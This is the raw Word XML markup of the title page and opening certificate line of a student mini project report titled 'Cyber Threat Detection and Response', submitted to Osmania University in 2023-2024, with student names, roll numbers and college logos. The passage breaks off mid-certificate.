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720" w:right="66" w:rightChars="33"/>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A Mini Project Report on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="66" w:rightChars="33"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>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b/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>CYBER THREAT DETECTION AND RESPONSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="66" w:rightChars="33"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>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color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Submitted to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="66" w:rightChars="33"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>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b/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>OSMANIA UNIVERSITY, Hyderabad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="66" w:rightChars="33"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>in partial fulfillment of the requirements for the award of degree</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="66" w:rightChars="33"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>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b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>BACHELOR OF ENGINEERING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"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b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"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b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">COMPUTER SCIENCE AND ENGINEERING </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"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b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>IOT, CS, BCT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="66" w:rightChars="33"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="66" w:rightChars="33"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Submitted by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="66" w:rightChars="33"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="66" w:rightChars="33"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>bdul Samad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>1610217490</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="66" w:rightChars="33"/>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Mohammed Abdul Raqeeb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                </w:t>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 xml:space="preserve">        1610217490</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>35</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="66" w:rightChars="33"/>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Mohammed FasiUddin Arsalaan                                161021749041</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2160" w:right="66" w:rightChars="33"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="66" w:rightChars="33"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:line="312" w:lineRule="auto"/>
        <w:ind w:left="363" w:right="66" w:rightChars="33"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="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Under the guidance of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:line="312" w:lineRule="auto"/>
        <w:ind w:left="363" w:right="66" w:rightChars="33"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Mr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>. M. K. IFTEQUAR ALI KHAN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:line="312" w:lineRule="auto"/>
        <w:ind w:left="363" w:right="66" w:rightChars="33"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="auto"/>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Assistant Professor of CSE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="66" w:rightChars="33"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="66" w:rightChars="33"/>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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1454785" cy="1228725"/>
            <wp:effectExtent l="0" t="0" r="12065" b="9525"/>
            <wp:docPr id="30" name="Picture 30" descr="nsakcet logo -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sakcet logo - colo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460418" cy="1233048"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="66" w:rightChars="33"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="426" w:right="66" w:rightChars="33"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>DEPT OF COMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">UTER SCIENCE AND ENGINEERING </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>IOT,CS, BCT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="66" w:rightChars="33"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="66" w:rightChars="33"/>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NAWAB SHAH ALAM KHAN COLLEGE OF ENGINEERING &amp; TECHNOLOGY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="66" w:rightChars="33"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="66" w:rightChars="33"/>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Malakpet, Hyderabad.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="66" w:rightChars="33"/>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bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>2023-2024</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5661660" cy="1698625"/>
            <wp:effectExtent l="0" t="0" r="15240" b="15875"/>
            <wp:docPr id="188732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2826"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1660" cy="1698625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>CERTIFICATE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="718" w:leftChars="179" w:right="66" w:rightChars="0" w:hanging="360" w:hangingChars="150"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This is to certify that the Mini Project on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
